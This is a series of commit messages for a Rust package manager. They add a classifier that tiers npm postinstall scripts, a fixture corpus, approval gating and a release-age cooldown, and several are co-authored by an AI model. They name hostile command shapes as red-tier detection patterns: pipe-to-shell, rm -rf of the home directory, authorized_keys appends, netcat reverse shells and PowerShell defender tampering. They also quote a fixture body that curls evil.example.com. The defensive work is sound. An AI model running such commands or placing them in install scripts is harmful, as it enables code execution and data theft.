  2. Quote-aware operator normalization (see below)
  3. shlex tokenization (parse failure → Amber)
  4. Tokenized red checks (MUST precede compound fallback so
     curl … | sh → Red, not Amber)
  5. Compound-operator detection (any &&, ||, ;, |, >, >>, <, <<, &,
     ( ), $(, backtick) → Amber
  6. Green allowlist match
  7. Fallback → Amber

Quote-aware operator normalizer fixes a review-round finding: shlex
splits on whitespace but does NOT recognize shell operators, so
`curl url|sh` tokenized as ["curl", "url|sh"] and silently
downclassified to Amber via the compound fallback. The normalizer
pads every UNQUOTED operator with surrounding whitespace before
shlex sees the string, tracks single-quote / double-quote /
backslash-escape state, and recognizes the four two-char operators
(&&, ||, >>, <<) as atomic units.
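
A simplified sketch of such a normalizer, not the shipped code. It covers
only the operator characters `|`, `&`, `;`, `>` and `<` (an assumed
subset), and the name `normalize_operators` is hypothetical. The real
pipeline hands the result to shlex; plain whitespace splitting is enough
to see the effect here.

```rust
/// Pads every unquoted, unescaped shell operator with spaces so a
/// whitespace-based tokenizer sees it as its own token.
fn normalize_operators(input: &str) -> String {
    let chars: Vec<char> = input.chars().collect();
    let mut out = String::with_capacity(input.len() + 8);
    let (mut in_single, mut in_double) = (false, false);
    let mut i = 0;
    while i < chars.len() {
        let c = chars[i];
        // A backslash escapes the next char, except inside single quotes.
        if c == '\\' && !in_single {
            out.push(c);
            if let Some(&next) = chars.get(i + 1) {
                out.push(next);
            }
            i += 2;
            continue;
        }
        if c == '\'' && !in_double {
            in_single = !in_single;
        } else if c == '"' && !in_single {
            in_double = !in_double;
        } else if !in_single && !in_double && matches!(c, '|' | '&' | ';' | '>' | '<') {
            // &&, ||, >>, << are kept together as one atomic operator.
            let doubled = c != ';' && chars.get(i + 1) == Some(&c);
            out.push(' ');
            out.push(c);
            if doubled {
                out.push(c);
                i += 1;
            }
            out.push(' ');
            i += 1;
            continue;
        }
        out.push(c);
        i += 1;
    }
    out
}
```

After normalization, `curl url|sh` splits into the tokens `curl`, `url`,
`|`, `sh`, so a tokenized pipe-to-shell check can match, while operator
characters inside quotes or after a backslash are left untouched.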

Contract: no execution semantics change. P2 populates static_tier
on BlockedPackage for UX annotation only; auto-execution of greens
is gated on P5 (sandbox) + P6 (tier-aware auto-run).

Ship:
- Adds shlex = "1.3" to workspace deps.
- 58 unit tests in static_gate::tests, including 7 regression tests
  for the no-space operator finding (curl|sh, base64 -d|sh,
  echo hi>~/.bashrc, tsc&&husky install, and three negative cases
  covering quoted / escaped operator characters).

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings          ✓
- cargo fmt --check                                  ✓
- grep -r 'fancy-regex' crates/*/Cargo.toml          ✓ (empty)
- cargo build --workspace                            ✓
- cargo nextest run --workspace --exclude lpm-integration-tests  ✓
  (3834 pass; known flake lpm-task perf_eval_glob passes serially)
- cargo nextest run -p lpm-security                  ✓ (387/387)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Clippy's let_and_return fires on `manager_with` under
`cargo clippy --all-targets` (not on the CI gate, which runs
`--workspace` only, so this has been silently red for anyone who
flips on --all-targets locally). One-line fix: return the struct
literal directly.

Surfaced while running the pre-merge CI gate for phase-46 P2
chunk 1 at --all-targets. Unblocks the lpm-auth clippy run; the
remaining --all-targets errors live in lpm-cli test code
(build_state.rs bool-literal assert_eq, trust.rs / trust_snapshot.rs
needless struct update) and are out of scope here.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…harness

Ships the starter fixture corpus (91 scripts across 14 categories)
plus a one-test integration harness that classifies every entry
against its declared expectation.

Layout:
  crates/lpm-security/tests/fixtures/postinstall-scripts/
    ├── README.md                  — naming / ship-criteria doc
    ├── expectations.json          — [{id, expected, notes?}]
    └── scripts/<id>.txt           — one raw body per entry

Corpus composition (deliberately biased toward amber/red coverage;
Chunk 6 grows toward 500 real-world postinstalls):
  green-*              (20) — allowlist hits (tsc, node-gyp rebuild,
                              prisma generate, husky[install],
                              electron-rebuild, node <relative>.{js,cjs,mjs})
  amber-d18-*          (10) — D18 network binary downloaders
                              (playwright, puppeteer, cypress,
                              electron-builder, node install.js)
  amber-compound-*     ( 8) — compounds of otherwise-green commands
  amber-novel-*        (12) — out-of-allowlist commands (python,
                              make, cmake, gulp, npx, yarn build…)
  amber-node-escape-*  ( 5) — node with escaping paths (../, /abs,
                              ~/, $HOME, no-ext)
  amber-parse-fail-*   ( 1) — unbalanced quote → shlex fails closed
  red-pipe-*           ( 5) — curl|sh / wget|bash / base64 -d|sh
  red-eval-*           ( 3) — eval, node -e, node --eval
  red-nested-pm-*      ( 8) — npm/pnpm/yarn/bun/pip/cargo/gem/brew
                              install
  red-rm-*             ( 4) — rm -rf ~ / / $HOME / ~/.ssh
  red-chmod-*          ( 2) — chmod outside package tree
  red-redirect-*       ( 3) — >> ~/.bashrc / ~/.ssh/authorized_keys
                              (including no-space regression)
  red-nc-*             ( 2) — nc / ncat reverse shell
  adversarial-*        ( 8) — §12.2 stress set: U+202E RTL override,
                              U+200D ZWJ, U+FEFF BOM,
                              Invoke-Expression, iex, FromBase64String,
                              Add-MpPreference, no-space pipe-bash

Harness (tests/static_gate_corpus.rs, one test, ~40ms):
- Loads manifest + each raw-body file, calls classify(), asserts
  declared expectation matches actual tier for every entry.
- Hard-fails on any false-positive red (§4.1 ship criterion).
- Hard-fails if the classifier ever emits AmberLlm (contract
  invariant: P2 owns Green|Amber|Red; AmberLlm is reserved for P8).
- Duplicate-id guard on manifest load.
- Prints per-run stats (total / green / amber / red + green-rate on
  the real-corpus subset) so tuning during Chunks 3–6 has continuous
  feedback. The ≥60% green-rate threshold is NOT asserted here —
  starter corpus is biased low by design (current: 35%); threshold
  flips to hard-gate in Chunk 6 once the corpus grows to 500.

Denominator for the ≥60% is pinned in the plan doc (§4.1 update in
a separate commit): green / (green + amber) over non-adversarial
entries, measured the same way the harness measures it today.
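
The denominator rule can be sketched as below. This is an illustration, not the harness code: the `Tier` enum, the tuple layout, and the use of the `adversarial-` id prefix to exclude entries are assumptions made for the example.

```rust
/// Tiers the P2 classifier may emit (AmberLlm is reserved for P8, so it is omitted).
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum Tier {
    Green,
    Amber,
    Red,
}

/// Green-rate = green / (green + amber), skipping ids that start with
/// `adversarial-`. Returns None when the denominator is zero.
pub fn green_rate(entries: &[(&str, Tier)]) -> Option<f64> {
    let mut green = 0u32;
    let mut amber = 0u32;
    for (id, tier) in entries {
        if id.starts_with("adversarial-") {
            continue;
        }
        match tier {
            Tier::Green => green += 1,
            Tier::Amber => amber += 1,
            // Reds are outside the denominator by definition.
            Tier::Red => {}
        }
    }
    let denominator = green + amber;
    if denominator == 0 {
        None
    } else {
        Some(f64::from(green) / f64::from(denominator))
    }
}
```

With the starter corpus counts listed above (20 green, 36 amber across the four amber categories) this yields 20/56, roughly 35%, which matches the figure quoted in the harness notes.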

Unicode bytes verified on disk (xxd):
  adversarial-001: E2 80 AE (U+202E RTL OVERRIDE)
  adversarial-002: E2 80 8D (U+200D ZWJ)
  adversarial-003: EF BB BF (U+FEFF BOM)

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-security                     ✓ (388/388)
- cargo nextest run --workspace --exclude lpm-integration-tests
  ✓ (3834/3836; the 2 failures are the known lpm-task perf_eval_* flake
  under parallel load, pass serially, not in touched crates)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…-builds UI/JSON

Static-gate classification now runs at install-time blocked-set
capture and is persisted on every fresh BlockedPackage. The tier
surfaces in both the human approve-builds card and the --json shape,
so the existing review flow gains the P2 tier annotation
immediately.

lpm-security/triage.rs
- Adds StaticTier::worse_of — canonical worst-wins reducer
  (Red > AmberLlm > Amber > Green). Symmetric, idempotent, fits
  Iterator::reduce directly. 7 precedence tests.
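
A minimal sketch of a worst-wins reducer with the precedence stated above. The `severity` ranking helper and the `worst_tier` wrapper are hypothetical; only `StaticTier::worse_of` and the ordering come from this commit.

```rust
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum StaticTier {
    Green,
    Amber,
    AmberLlm,
    Red,
}

impl StaticTier {
    /// Rank used only for comparison: Red > AmberLlm > Amber > Green.
    fn severity(self) -> u8 {
        match self {
            StaticTier::Green => 0,
            StaticTier::Amber => 1,
            StaticTier::AmberLlm => 2,
            StaticTier::Red => 3,
        }
    }

    /// Worst-wins reducer: returns whichever of the two tiers is more severe.
    pub fn worse_of(self, other: Self) -> Self {
        if other.severity() > self.severity() {
            other
        } else {
            self
        }
    }
}

/// Folds per-phase tiers into one package-level tier; None when there are no phases.
pub fn worst_tier(tiers: &[StaticTier]) -> Option<StaticTier> {
    tiers.iter().copied().reduce(StaticTier::worse_of)
}
```

Because `worse_of` takes and returns plain `StaticTier` values, it can be passed to `Iterator::reduce` by name with no closure.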

lpm-cli/build_state.rs
- Replaces read_present_install_phases with
  read_install_phase_bodies — returns Vec<(phase_name, body)> in
  canonical EXECUTED_INSTALL_PHASES order. One read + parse of
  package.json feeds both phases_present derivation and the
  classifier; old helper had one caller and is deleted.
- compute_blocked_packages_with_metadata classifies each present
  phase body via lpm_security::static_gate::classify, folds
  worst-wins via StaticTier::worse_of, and writes the result to
  BlockedPackage.static_tier. Populated unconditionally per plan
  §5.1 (annotation works under deny/triage/allow). A freshly
  computed BlockedPackage always has Some(tier); None indicates
  persisted state predates P2.
- 8 new tests: read_install_phase_bodies order + empty-body skip +
  error paths; worst-wins population for Green, Red, Green+Red→Red,
  Green+Amber→Amber; always-Some invariant.

lpm-cli/commands/approve_builds.rs
- SCHEMA_VERSION: 1 → 2 (per plan §6.4). Version-history doc
  captures the v2 delta.
- blocked_to_json emits "static_tier": kebab-case string or null.
  null (not omitted) for v1 legacy state so agents can distinguish
  "no tier known" from "field missing" without re-checking
  schema_version per row.
- print_package_card renders `Static tier: <label>` with color
  (green→green, amber/amber-llm→yellow, red→red). Absent means the
  blocked state predates P2; no line is printed rather than
  showing "unknown".
- tier_label_text + colored_tier_label split — pure helper is
  unit-testable, color wrapper is separate. 8 new tests: schema
  bump, every tier→JSON mapping, null-when-absent, label
  distinctness, label prefix, colored-embeds-plain.
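
The null-versus-string rule for `static_tier` might look like the sketch below. Both function names are hypothetical, and the real code presumably goes through a JSON library rather than building strings by hand; the point is only the mapping.

```rust
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum StaticTier {
    Green,
    Amber,
    AmberLlm,
    Red,
}

/// Kebab-case wire name for a tier (hypothetical helper name).
pub fn tier_kebab_name(tier: StaticTier) -> &'static str {
    match tier {
        StaticTier::Green => "green",
        StaticTier::Amber => "amber",
        StaticTier::AmberLlm => "amber-llm",
        StaticTier::Red => "red",
    }
}

/// JSON fragment for the `static_tier` field: a quoted kebab-case name when
/// the tier is known, or a literal `null` (never an omitted key) when the
/// persisted state predates P2.
pub fn static_tier_json_value(tier: Option<StaticTier>) -> String {
    match tier {
        Some(t) => format!("\"{}\"", tier_kebab_name(t)),
        None => "null".to_string(),
    }
}
```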

lpm-cli/tests/approve_builds_audit_regression.rs
- Two stdout-JSON contract tests pinned schema_version == 1;
  bumped to 2 with inline comment pointing at this change.

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-cli                          ✓ (1436/1436)
- cargo nextest run --workspace --exclude lpm-integration-tests
  ✓ (3856/3860; the 4 failures are the known lpm-task perf_eval_* flake
  under parallel load; all 4 pass serially in 0.28s, not in touched
  crates)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Completes the `script-policy=triage` UX contract from plan §11 P2:
bulk approval is restricted to the green tier. Non-green entries
must go through the interactive walk or single-package approval so
each gets explicit human review.

Refusal contract (contract with agents: "--yes refuses" prefix is
stable P2-onward for substring-matching on the error payload):
- Some(Green) → pass (still requires explicit --yes; auto-execution
  is P6, gated on the P5 sandbox per D20).
- None → pass. Pre-P2 persisted state carries None; breaking
  existing --yes muscle memory during a P1→P2 upgrade before the
  next fresh install recaptures tiers would be a silent
  regression. The next install populates tiers and from then on
  the gate applies.
- Some(Amber | AmberLlm | Red) → refuse, list each refused
  {name}@{version} + tier label, redirect to `lpm approve-builds`
  interactive / `lpm approve-builds <pkg>` / `lpm approve-builds
  --list`.
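
The refusal contract above can be sketched as a pure function. Assumptions for the example: `BlockedPackage` is reduced to three fields, the error is a plain `String` instead of `LpmError`, and everything in the message after the stable "--yes refuses" prefix is invented wording.

```rust
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum StaticTier {
    Green,
    Amber,
    AmberLlm,
    Red,
}

/// Simplified stand-in for the real BlockedPackage.
pub struct BlockedPackage {
    pub name: String,
    pub version: String,
    pub static_tier: Option<StaticTier>,
}

/// Passes Some(Green) and None; refuses Amber, AmberLlm, and Red, listing
/// each refused {name}@{version} with its tier label.
pub fn enforce_tiered_yes_gate(blocked: &[BlockedPackage]) -> Result<(), String> {
    let refused: Vec<String> = blocked
        .iter()
        .filter_map(|pkg| {
            let label = match pkg.static_tier {
                // Green and pre-P2 (None) entries are not refused.
                None | Some(StaticTier::Green) => return None,
                Some(StaticTier::Amber) => "amber",
                Some(StaticTier::AmberLlm) => "amber-llm",
                Some(StaticTier::Red) => "red",
            };
            Some(format!("{}@{} [{}]", pkg.name, pkg.version, label))
        })
        .collect();

    if refused.is_empty() {
        return Ok(());
    }
    Err(format!(
        "--yes refuses {} non-green package(s): {}. Review them with `lpm approve-builds`.",
        refused.len(),
        refused.join(", ")
    ))
}
```

Since the function has no side effects, a caller can run it before any banner or manifest write and bail out cleanly on `Err`.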

Gate placement: the enforce_tiered_yes_gate call sits BEFORE
emit_yes_warning_banner at approve_builds.rs:309. Emitting the
banner (human stdout + tracing::warn!) and then aborting would
corrupt log aggregators and the console with success-shaped output
for a no-op — the gate must refuse before any side effect. Manifest
write_back is similarly gated, so a refusal leaves package.json
byte-identical to its pre-call form (asserted by the e2e test).

Implementation:
- New pure helper `enforce_tiered_yes_gate(&[BlockedPackage])
  -> Result<(), LpmError>` next to the existing tier-label helpers.
- Existing approve_builds e2e fixtures that used
  `"postinstall": "node install.js"` were AMBER under Chunk 3 (D18
  binary-fetcher convention) and would make --yes refuse. Switched
  the 5 initial-install bodies to `"tsc"` (green) — the tests'
  intent is state-machine transitions, not the specific body. The
  drift-injection body at line 2341 (`"node install.js && curl
  evil.example.com"`) stays because it's set AFTER approval and
  never hits the gate.

Tests (12 new):
- 9 pure enforce_tiered_yes_gate tests: empty / all-green / all-None /
  mixed green+None / single amber / single amber-llm / single red /
  mixed (count accuracy + listing only refusals) /
  error-message redirects to interactive path.
- 3 e2e tests via run(): amber refuses + manifest byte-unchanged,
  all-green approves, None-tiered legacy state passes through.

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-cli                          ✓ (1448/1448)
- cargo nextest run --workspace --exclude lpm-integration-tests
  ✓ (3870/3872; the 2 failures are the known lpm-task perf_eval_* flake
  under parallel load; all 4 perf_eval_* tests pass serially in 0.4s,
  not in touched crates)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Under `script-policy = "triage"`, `lpm install` emits a single-line
per-tier summary in place of the existing multi-line build hint.
`deny` and `allow` paths are unchanged. Line shape is stable
P2-onward (snapshot-tested):

  script-policy: triage (N green / M amber / K red → lpm approve-builds)

Agents parsing the line have two stable anchors:
- prefix: `"script-policy: triage ("`
- suffix: `" → lpm approve-builds)"`

Helpers (build_state.rs):
- count_blocked_by_tier — returns (green, amber, red). AmberLlm and
  None collapse into amber (conservative: unknown → needs review).
- format_triage_summary_line — deterministic formatter over the
  count. Both are shared with future --json install output so human
  and machine shapes agree on the arithmetic.
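
A sketch of the two helpers under simplifying assumptions: the counter takes a slice of optional tiers rather than blocked-package records, and the formatter takes the three counts as separate arguments. The line shape and the collapse rule are as described above.

```rust
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum StaticTier {
    Green,
    Amber,
    AmberLlm,
    Red,
}

/// Returns (green, amber, red). AmberLlm and None both count as amber,
/// so an unknown tier is treated as "needs review".
pub fn count_blocked_by_tier(tiers: &[Option<StaticTier>]) -> (usize, usize, usize) {
    let mut counts = (0, 0, 0);
    for tier in tiers {
        match tier {
            Some(StaticTier::Green) => counts.0 += 1,
            Some(StaticTier::Red) => counts.2 += 1,
            Some(StaticTier::Amber) | Some(StaticTier::AmberLlm) | None => counts.1 += 1,
        }
    }
    counts
}

/// Deterministic one-line summary with the stable prefix and suffix anchors.
pub fn format_triage_summary_line(green: usize, amber: usize, red: usize) -> String {
    format!("script-policy: triage ({green} green / {amber} amber / {red} red → lpm approve-builds)")
}
```

Keeping the counting separate from the formatting is what lets a future JSON output reuse the same numbers without parsing the human line.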

Install-path wiring:
- run_with_options gains `script_policy_override: Option<ScriptPolicy>`
  and at the show_install_build_hint site loads the project's
  ScriptPolicyConfig, resolves against the override, and branches:
  if effective == Triage → emit format_triage_summary_line; else →
  legacy show_install_build_hint + output::info redirect.
- run_link_and_finish (the lockfile fast path) mirrors the same
  branch at its own hint site. Both install code paths stay in
  sync.
- run_add_packages and run_install_filtered_add forward the
  override through to run_with_options.
- main.rs: preserves the collapsed CLI override separately so all
  four install-dispatch sites forward it. Per-target resolution
  re-evaluates against the target's package.json (matters for
  workspace-filtered installs where the member may set its own
  scriptPolicy).

Internal install callers (9 files: add, deploy, dev, doctor,
install_global, migrate, run, update_global, upgrade) pass `None`
— these don't expose --policy/--yolo/--triage flags and inherit
the project-config precedence.

Tests (7 new, all in build_state::tests):
- count_blocked_by_tier_empty_returns_zeros
- count_blocked_by_tier_counts_green_amber_red_distinctly
- count_blocked_by_tier_amber_llm_counts_as_amber
- count_blocked_by_tier_none_counts_as_amber_conservative
- format_triage_summary_line_shape_is_stable (snapshot)
- format_triage_summary_line_all_zero_when_empty
- format_triage_summary_line_anchor_and_suffix_present

Queued for a later chunk (noted from reviewer): a stdout-capture
e2e test for the triage branch on the lockfile fast path. Not a
sign-off blocker — branch selection is thin glue over well-tested
helpers.

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-cli                          ✓ (1455/1455)
- cargo nextest run --workspace --exclude lpm-integration-tests
  ✓ (3878/3879; the 1 failure is the known lpm-task perf_eval_glob
  parallel-load flake, all 4 perf_eval tests pass serially in 0.38s;
  not in touched crates)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… hard-gate ≥60% green-rate

Closes the P2 ship contract from plan §18:
- Top-500 postinstall fixture corpus locked (500 entries, hard-asserted).
- ≥60% green classification rate (73% measured, hard-asserted).
- Zero false-positive reds (asserted).
- Adversarial corpus locked and passing (20 entries, all red-expected).
- Execution semantics still unchanged (annotation-only per D20).

Corpus growth (91 → 500):
- +409 fixture files across 14 categories. Distribution reflects
  real-world top-500 postinstall shape: greens dominate (node-gyp
  rebuild, tsc, husky install, prisma generate account for most
  package postinstalls), ambers cover D18 network binary downloaders
  + common build-tool patterns, reds cover attack classes with
  variety for regression coverage.
- Final breakdown: 310 green / 114 amber / 76 red, with the 20
  adversarial entries counted among the 76 reds (310 + 114 + 76 = 500).
- Green-rate over non-adversarial subset: 73% (well above the 60%
  ship-criterion floor).

Harness enforcement (closes a late-Chunk-6 audit):
- New constant CORPUS_MIN_ENTRIES = 500. A drop to 499 now hard-fails
  with a message pointing at plan §18 and telling future maintainers
  to update doc + const in lockstep if the floor is lowered
  deliberately. Previously the harness only asserted "not empty",
  which left "500 locked" documentary-only.
- New assert_manifest_matches_filesystem: enumerates scripts/*.txt
  and does a BTreeSet bijection check against manifest ids. Orphans
  in either direction hard-fail with a labelled listing (missing-
  script vs missing-manifest-entry). Previously the harness only
  loaded manifest entries, so orphan files or stale manifest rows
  drifted silently.
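
The bijection check reduces to two set differences. In this sketch the ids are passed in as ready-made sets (the real helper enumerates scripts/*.txt itself), and the function name `manifest_drift` is hypothetical.

```rust
use std::collections::BTreeSet;

/// Compares manifest ids against script-file ids and returns
/// (missing_script, missing_manifest_entry): ids declared in the manifest
/// with no file on disk, and files on disk with no manifest row.
/// Both lists come back sorted because BTreeSet iterates in order.
pub fn manifest_drift(
    manifest_ids: &BTreeSet<String>,
    script_ids: &BTreeSet<String>,
) -> (Vec<String>, Vec<String>) {
    let missing_script: Vec<String> =
        manifest_ids.difference(script_ids).cloned().collect();
    let missing_manifest_entry: Vec<String> =
        script_ids.difference(manifest_ids).cloned().collect();
    (missing_script, missing_manifest_entry)
}
```

A harness would hard-fail when either list is non-empty and print the two lists under separate labels.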

expectations.json regenerated from the filesystem and is now
mechanically regenerable via the README's Python one-liner. Notes
fields dropped — category lives in the id prefix, and stripping
notes makes the manifest trivially derivable from disk which is what
the bijection check exploits.

README updated: "starter set" → "500-script fixture set"; ship
criteria restated as hard-asserted; regeneration instructions embed
the manifest-from-filesystem command. Plan-doc contract ("top-500
corpus locked") now matches on-disk reality.

Tuning discipline followed per reviewer guidance: corpus growth came
first, miss shapes measured (zero — the classifier rules hold
across the broader corpus), no red rule was weakened, no green rule
was widened. Reached 73% green-rate naturally.

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-security                     ✓ (395/395)
- cargo nextest run --workspace --exclude lpm-integration-tests
  ✓ (3878/3879; the 1 failure is the known lpm-task perf_eval_glob
  parallel-load flake, passes serially; not in touched crates)

P2 is complete. Next work moves to P3 (cooldown surface) per the
plan's phase ordering.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…oercion

Lands the plumbing for the Phase 46 P3 cooldown surface (§8, §11 P3)
without yet wiring it into install.rs — that's Chunk 2 alongside the
`--min-release-age=<dur>` clap flag.

Core pieces:

* `lpm-cli/src/release_age_config.rs` — new module.
  * `parse_duration(&str) -> Result<u64, LpmError>` accepts `72h` / `3d` /
    plain seconds; rejects empty, whitespace, unsupported units, negative
    values, fractionals, `+` prefix (u64::from_str quietly takes it), and
    multiplication overflow on h/d.
  * `ReleaseAgeResolver::resolve(project_dir, cli_override)` walks the
    §11 P3 precedence chain highest first: CLI → `package.json > lpm >
    minimumReleaseAge` → `~/.lpm/config.toml` key
    `minimum-release-age-secs` → default 86400. `./lpm.toml` is
    deliberately NOT in the chain (D14).
  * `read_global_min_age_from_file` is path-aware + fallible, mirroring
    Phase 33's save-config loader. Malformed TOML, non-table top level,
    and garbage values surface file-pathed errors with the offending
    key name — not silently ignored the way `GlobalConfig::load`
    swallows them.
  * `parse_strict_u64_string` — single `pub(crate)` helper for every
    string-to-seconds coercion site. Rejects `+` / `-` prefixes before
    `parse::<u64>`, because `u64::from_str("+5")` silently returns
    `Ok(5)` and would otherwise let `lpm config set
    minimum-release-age-secs +259200` slip through a contract the CLI
    parser rejects.

* `lpm-security/src/lib.rs` — new `SecurityPolicy::with_resolved_min_age`
  constructor. Reads `trustedDependencies` from package.json with the
  same tolerance as `from_package_json` but takes the seconds value
  from the caller. Keeps lpm-security free of CLI/config-file
  knowledge; `from_package_json` itself is untouched.

* `lpm-cli/src/commands/config.rs` — `GlobalConfig::get_u64` convenience
  reader, routing string coercion through `parse_strict_u64_string`
  for uniform "no sign prefix" semantics across CLI flag, global
  loader, and this accessor.
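
A minimal sketch of the strict parsing contract described above. The function names match the commit, but the bodies are illustrative and the error type is a plain `String` rather than `LpmError`.

```rust
/// Strict string-to-u64: refuses a leading sign before delegating to
/// `parse::<u64>`, because `"+5".parse::<u64>()` succeeds with 5.
pub fn parse_strict_u64_string(s: &str) -> Result<u64, String> {
    if s.starts_with('+') || s.starts_with('-') {
        return Err(format!("sign prefix not allowed: {s:?}"));
    }
    s.parse::<u64>()
        .map_err(|e| format!("invalid integer {s:?}: {e}"))
}

/// Accepts `<N>h`, `<N>d`, or plain seconds and returns seconds.
/// Empty input, whitespace, fractionals, and unknown units all fail in
/// `parse::<u64>`; overflow on the unit multiplication fails explicitly.
pub fn parse_duration(input: &str) -> Result<u64, String> {
    let (digits, unit_secs) = if let Some(n) = input.strip_suffix('h') {
        (n, 3_600u64)
    } else if let Some(n) = input.strip_suffix('d') {
        (n, 86_400u64)
    } else {
        (input, 1u64)
    };
    let count = parse_strict_u64_string(digits)?;
    count
        .checked_mul(unit_secs)
        .ok_or_else(|| format!("duration overflows u64: {input:?}"))
}
```

Routing every coercion site through the one strict helper is what keeps the CLI flag, the global loader, and the accessor in agreement about sign prefixes.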

Test coverage (50 unit tests, all pass): parser edge cases incl.
`+`/`-`/whitespace/garbage/overflow; global-file reader missing /
empty / integer / string-coerced / negative / garbage / wrong-type /
malformed-TOML all with file-pathed errors; resolver precedence
covering every §11 P3 ship-criteria case; `parse_strict_u64_string`
unit tests; plus-prefix regression guards on both the global loader
and `GlobalConfig::get_u64` (reviewer finding).

The `#[allow(dead_code)]` attributes on the module and on `get_u64` are
explicit "Chunk 2 removes this" scaffolds: the items are exercised by
unit tests but not yet called from the binary target. They come off
atomically when the clap flag + install.rs wiring lands.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
  — 3927 pass / 2 fail. Both failures are
  `lpm-task filter::eval::tests::perf_eval_*`, the known parallel-
  nextest flakes called out in the P3 prompt; pass deterministically
  with `-j 1`.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…urface

Wires the Chunk 1 resolver into the install pipeline and exposes the
Phase 46 P3 CLI surface (§8, §11 P3). After this commit a user-visible
override chain exists end-to-end: `--min-release-age=<dur>` → package.json
→ `~/.lpm/config.toml` → default 24h.
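
The precedence chain can be sketched as a chain of `Option::or` calls. This illustration assumes each layer has already been read and validated into an `Option<u64>` of seconds; the real resolver takes a project directory and does the reading itself, and the function name here is hypothetical.

```rust
/// Default cooldown window in seconds (24h).
pub const DEFAULT_MIN_RELEASE_AGE_SECS: u64 = 86_400;

/// Highest-precedence layer wins: CLI flag, then package.json,
/// then the global config file, then the built-in default.
pub fn resolve_min_release_age(
    cli_override: Option<u64>,
    package_json: Option<u64>,
    global_config: Option<u64>,
) -> u64 {
    cli_override
        .or(package_json)
        .or(global_config)
        .unwrap_or(DEFAULT_MIN_RELEASE_AGE_SECS)
}
```

Note that an explicit `Some(0)` at a higher layer still wins over a non-zero lower layer, which is how `--min-release-age=0` can disable the check for a single install.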

CLI surface:
* `lpm install --min-release-age=<DUR>` — accepts `<N>h`, `<N>d`, or
  plain seconds. Parsed once at the clap layer via
  `release_age_config::parse_duration`; invalid input errors before any
  install work starts.
* `--allow-new` unchanged (blanket bypass, orthogonal to this flag).
* Blocked-packages hint reordered narrowest → broadest per the §11 P3
  ship criteria: `--min-release-age=0` (per-install, numeric),
  `--allow-new` (per-install, blanket), `package.json` (persistent).
* Error message surfaces both override paths.

Install pipeline:
* `run_with_options`, `run_add_packages`, `run_install_filtered_add`
  grow `min_release_age_override: Option<u64>` at end of signature.
* Cooldown gate at install.rs:1646 now calls
  `ReleaseAgeResolver::resolve(project_dir, override)?` +
  `SecurityPolicy::with_resolved_min_age(...)` in place of
  `SecurityPolicy::from_package_json(...)`. One user-visible
  behaviour change lands with this: a malformed `~/.lpm/config.toml`
  (or garbage `minimum-release-age-secs` value) now fails install with
  a file-pathed error rather than being silently ignored — that's the
  path-aware loader contract from the Chunk 1 review, now live.

Global-install rejection (reviewer finding):
* `validate_global_install_project_scoped_flags` extended to reject
  `--min-release-age` on the `-g` path with an explicit Phase 46.1
  pointer. Without this the clap flag was parsed AFTER the `-g` early
  return, so even `--min-release-age=garbage` silently passed — a
  contract bug where the shared `Install` clap surface advertised a
  flag that global installs silently ignored.
* New regression test covers four payload shapes
  (`0`, `72h`, `garbage`, `+5h`) — each asserts the error names the
  flag AND points at Phase 46.1.

Fan-out to 9 non-Install install-pipeline callers
(`add`, `deploy`, `dev`, `doctor`, `migrate`, `run`, `upgrade`,
`install_global`, `update_global`): each passes `None` with a
one-line comment explaining why (`uses the chain` / D13/D19 global
scope / `deploy already bypasses via allow_new=true`).

Scaffolds: Chunk 1's `#![allow(dead_code)]` on the module and the
temporary "Chunk 2 removes this" note on `GlobalConfig::get_u64` come
off. `get_u64` keeps a single `#[allow(dead_code)]` with an honest
note — it's retained for the behavioural unit test and future callers;
no production caller exists because the resolver uses the path-aware
fallible helper instead.

Behavioural verification (manual, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `lpm-rs install --help` — flag documented with full precedence chain.
* `lpm-rs install --min-release-age=garbage` → exit 1 with duration-
  parse error.
* `lpm-rs install -g foo --min-release-age=garbage` → exit 1 at CLI-
  exclusivity check (before parse_duration runs).
* `lpm-rs install -g foo --min-release-age=0` → exit 1, same rejection.
* `lpm-rs install -g foo` (no flag) → exit 0, proceeds normally.

CI gate (explicit):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
  — 3928 pass / 2 fail. Both failures are the known
  `lpm-task filter::eval::tests::perf_eval_*` parallel-nextest flakes
  pre-flagged in the P3 prompt; pass deterministically with `-j 1`.

